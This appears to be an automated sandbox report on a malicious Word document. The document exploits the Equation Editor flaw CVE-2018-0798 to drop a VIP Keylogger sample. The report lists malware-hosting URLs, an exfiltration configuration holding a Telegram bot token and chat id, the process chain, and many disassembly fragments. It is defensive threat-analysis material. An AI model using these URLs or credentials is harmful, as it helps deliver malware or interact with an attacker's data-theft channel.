Windows Analysis Report
order072724.docx.doc

AV Detection

Source: https://meridianresourcellc.top/swagodi.scrj	Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/swagodi.scrsoC:	Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/	Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/swagodi.doc	Avira URL Cloud: Label: phishing
Source: https://meridianresourcellc.top/swagodi.scr	Avira URL Cloud: Label: malware
Source: https://meridianresourcellc.top/swagodi.scrllC:	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp

Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen

Source: 10.2.swagodi78811.scr.316cb90.4.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7222270709:AAEe8p8C3uTJGMDBeQJ80Oh9drnBDJzIaE4", "Chat id": "-4219735485"}

Source: order072724.docx.doc

ReversingLabs: Detection: 42%

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr	Joe Sandbox ML: detected

Location Tracking

Source: unknown

DNS query: name: reallyfreegeoip.org

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.21.52.88 Port: 443

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\swagodi78811.scr			Jump to behavior

Source: ~WRF{1C83C99B-998E-4DEF-B324-E69763DD529E}.tmp.0.dr

Stream path '_1783521069/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

Source: unknown	HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49203 version: TLS 1.2

Source:	Binary string: lxqb.pdbSHA256 source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr
Source:	Binary string: lxqb.pdb source: swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00421EF6h		10_2_00422154
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		20_2_002069F0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00209B83h		20_2_00209A20
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 002095C1h		20_2_00209300
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 002076B5h		20_2_002074C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0020803Fh		20_2_002074C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		20_2_00207022
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0020EB31h		20_2_0020E830
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0020F461h		20_2_0020F181
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		20_2_00207201
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00209B83h		20_2_00209A08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0020FD91h		20_2_0020FAB1
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00209B83h		20_2_00209AB2
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00206544h		20_2_002063A8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0020EFC9h		20_2_0020ECE8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00206544h		20_2_00206593
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0020F8F9h		20_2_0020F619
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067F372h		20_2_0067F078
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00671571h		20_2_006712A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00678A42h		20_2_00678748
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00672339h		20_2_00672068
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00676349h		20_2_00676078
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00670311h		20_2_00670040
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00674321h		20_2_00674050
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00677ED9h		20_2_00677C08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00678F0Ah		20_2_00678C10
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006747B9h		20_2_006744E8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067ABBAh		20_2_0067A8C0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006707A9h		20_2_006704D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006793D2h		20_2_006790D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00678412h		20_2_006780A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067C3A2h		20_2_0067C0A8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067DB8Ah		20_2_0067D890
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00670C41h		20_2_00670970
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067C86Ah		20_2_0067C570
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067F83Ah		20_2_0067F540
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067E052h		20_2_0067DD58
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006727D1h		20_2_00672500
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006767E1h		20_2_00676510
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067989Ah		20_2_006795A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00676C7Ah		20_2_006769A8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00674C51h		20_2_00674980
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067B082h		20_2_0067AD88
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00672C69h		20_2_00672998
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00679D62h		20_2_00679A68
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00677111h		20_2_00676E40
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067B54Ah		20_2_0067B250
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067E51Ah		20_2_0067E220
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00673101h		20_2_00672E30
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067CD32h		20_2_0067CA38
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006710D9h		20_2_00670E08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067FD02h		20_2_0067FA08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006750E9h		20_2_00674E18
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067E9E2h		20_2_0067E6E8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00673599h		20_2_006732C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006775A9h		20_2_006772D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00675581h		20_2_006752B0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00673A31h		20_2_00673760
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00677A41h		20_2_00677770
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00675A19h		20_2_00675748
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067A22Ah		20_2_00679F30
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00671A09h		20_2_00671738
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067D1FAh		20_2_0067CF00
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067BA12h		20_2_0067B718
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00675EB1h		20_2_00675BE0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067BEDAh		20_2_0067BBE0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00673EA1h		20_2_00673BF8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067A6F2h		20_2_0067A3F8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067D6C2h		20_2_0067D3C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 00671EA1h		20_2_00671BD0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 0067EEAAh		20_2_0067EBB0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D4162h		20_2_006D3E68
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D033Ah		20_2_006D0040
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D1B22h		20_2_006D1828
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D330Ah		20_2_006D3010
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D1FEAh		20_2_006D1CF0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D37D2h		20_2_006D34D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D297Bh		20_2_006D2680
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D1192h		20_2_006D0E98
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D165Ah		20_2_006D1360
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D2E42h		20_2_006D2B48
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D0802h		20_2_006D0508
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D0CCAh		20_2_006D09D0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D3C9Ah		20_2_006D39A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 006D24B2h		20_2_006D21B8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BB5C1h		20_2_021BB318
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BF0E1h		20_2_021BEE10
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B92A9h		20_2_021B9000
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B62E1h		20_2_021B6038
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B55D9h		20_2_021B5330
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BDCD9h		20_2_021BDA30
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BCFD1h		20_2_021BCD28
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B48D1h		20_2_021B4628
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BC2C9h		20_2_021BC020
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B3BC9h		20_2_021B3920
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B9701h		20_2_021B9458
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B89F9h		20_2_021B8750
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B7CF1h		20_2_021B7A48
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BFA11h		20_2_021BF740
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B6FE9h		20_2_021B6D40
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B4021h		20_2_021B3D78
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BC721h		20_2_021BC478
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BEC49h		20_2_021BE978
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BBA19h		20_2_021BB770
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B3319h		20_2_021B3070
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BAD11h		20_2_021BAA68
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B7441h		20_2_021B7198
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B6739h		20_2_021B6490
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B5A31h		20_2_021B5788
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BE1C5h		20_2_021BDE88
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BD429h		20_2_021BD180
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B4D29h		20_2_021B4A80
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B9B59h		20_2_021B98B0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BF579h		20_2_021BF2A8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B8E51h		20_2_021B8BA8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B8149h		20_2_021B7EA0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B5181h		20_2_021B4ED8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BD881h		20_2_021BD5D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BCB7Bh		20_2_021BC8D0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B4479h		20_2_021B41D0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B3771h		20_2_021B34C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BBE71h		20_2_021BBBC8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BB169h		20_2_021BAEC0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B85A1h		20_2_021B82F8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B7899h		20_2_021B75F0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B6B91h		20_2_021B68E8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021B5E89h		20_2_021B5BE0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then jmp 021BE7B1h		20_2_021BE4E0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		20_2_022E5F28
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		20_2_022E5F38
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		20_2_022E2B00
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		20_2_022E2E16
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		20_2_022E2A50
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 4x nop then lea esp, dword ptr [ebp-04h]		20_2_022E29CE
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00591496h		22_2_005916F4
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00209449h		29_2_00209188
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		29_2_00206C80
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00209A0Bh		29_2_002095F8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00207945h		29_2_00207758
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 002082CFh		29_2_00207758
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 002067D4h		29_2_00206823
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0020F2E9h		29_2_0020F009
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0020FC19h		29_2_0020F939
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00209A0Bh		29_2_0020993A
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		29_2_002072B2
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0020EE51h		29_2_0020EB3A
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 0020F781h		29_2_0020F4A1
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h		29_2_00207491
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 002067D4h		29_2_00206638
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9F372h		29_2_00A9F078
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A927D1h		29_2_00A92500
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A98A42h		29_2_00A98748
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9C3A2h		29_2_00A9C0A8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A98412h		29_2_00A980A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9DB8Ah		29_2_00A9D890
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A947B9h		29_2_00A944E8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9ABBAh		29_2_00A9A8C0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A907A9h		29_2_00A904D8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A993D2h		29_2_00A990D8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A97ED9h		29_2_00A97C08
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A98F0Ah		29_2_00A98C10
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A92339h		29_2_00A92068
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A96349h		29_2_00A96078
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A90311h		29_2_00A90040
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A94321h		29_2_00A94050
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A96C7Ah		29_2_00A969A8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9989Ah		29_2_00A995A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9B082h		29_2_00A9AD88
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A94C51h		29_2_00A94980
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A92C69h		29_2_00A92998
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A967E1h		29_2_00A96510
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A90C41h		29_2_00A90970
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9C86Ah		29_2_00A9C570
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9F83Ah		29_2_00A9F540
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9E052h		29_2_00A9DD58
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A91571h		29_2_00A912A0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A95581h		29_2_00A952B0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9E9E2h		29_2_00A9E6E8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A93599h		29_2_00A932C8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A975A9h		29_2_00A972D8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9E51Ah		29_2_00A9E220
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9CD32h		29_2_00A9CA38
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A93101h		29_2_00A92E30
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A910D9h		29_2_00A90E08
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9FD02h		29_2_00A9FA08
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A950E9h		29_2_00A94E18
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A99D62h		29_2_00A99A68
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A97111h		29_2_00A96E40
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9B54Ah		29_2_00A9B250
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9EEAAh		29_2_00A9EBB0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A95EB1h		29_2_00A95BE0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9BEDAh		29_2_00A9BBE0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A93EA1h		29_2_00A93BF8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9A6F2h		29_2_00A9A3F8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9D6C2h		29_2_00A9D3C8
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A91EA1h		29_2_00A91BD0
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A91A09h		29_2_00A91738
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9A22Ah		29_2_00A99F30
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9D1FAh		29_2_00A9CF00
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A9BA12h		29_2_00A9B718
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A93A31h		29_2_00A93760
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A97A41h		29_2_00A97770
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 00A95A19h		29_2_00A95748
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F330Ah		29_2_020F3010
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F1B22h		29_2_020F1828
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F033Ah		29_2_020F0040
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F4162h		29_2_020F3E68
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F297Bh		29_2_020F2680
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Code function: 4x nop then jmp 020F1192h		29_2_020F0E98
